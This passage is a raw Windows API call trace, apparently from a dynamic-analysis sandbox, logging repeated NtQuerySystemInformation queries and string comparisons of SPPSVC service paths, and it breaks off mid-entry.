[0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0272.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0272.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x20, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0272.245] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7d0, Length=0x28, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0272.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0272.257] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7d0, Length=0x28, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0272.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0272.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0272.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0272.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb90, Length=0x28, ResultLength=0x0) [0272.268] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0272.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0272.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0272.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca80, Length=0x28, ResultLength=0x0) [0272.269] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0272.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0272.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0272.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0272.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x28, ResultLength=0x0) [0272.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x28, ResultLength=0x0) [0272.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.271] NtQuerySystemInformation (SystemInformationClass=0xb9, 